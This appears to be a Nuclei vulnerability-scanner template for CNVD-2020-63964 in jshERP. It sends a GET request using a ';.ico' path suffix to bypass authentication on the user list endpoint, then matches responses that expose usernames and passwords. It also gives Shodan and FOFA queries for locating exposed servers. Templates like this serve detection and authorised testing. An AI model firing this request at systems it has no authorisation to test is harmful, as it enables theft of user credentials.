id: CNVD-2020-63964

info:
  name: jshERP - Information Disclosure
  author: brucelsone
  severity: high
  description: |
    jshERP that can reveal sensitive information including system credentials without credentials.
  reference:
    - https://cn-sec.com/archives/1798444.html
  metadata:
    max-request: 1
    shodan-query: http.favicon.hash:-1298131932
    fofa-query: jshERP-boot
  tags: 华夏-ERP

http:
  - method: GET
    path:
      - "{{BaseURL}}/jshERP-boot/user/getAllList;.ico"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"username":'
          - '"loginName":'
          - '"password":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200

# digest: 490a004630440220724fbe911c6045e6bd88cdecf992f17b38734db6441c339eefba055d2bc8d2650220694911df91087bd1ae6245a7ba64036d57b000e9fb8272257b925fbd84115253:922c64590222798bb761d5b6d8e72950
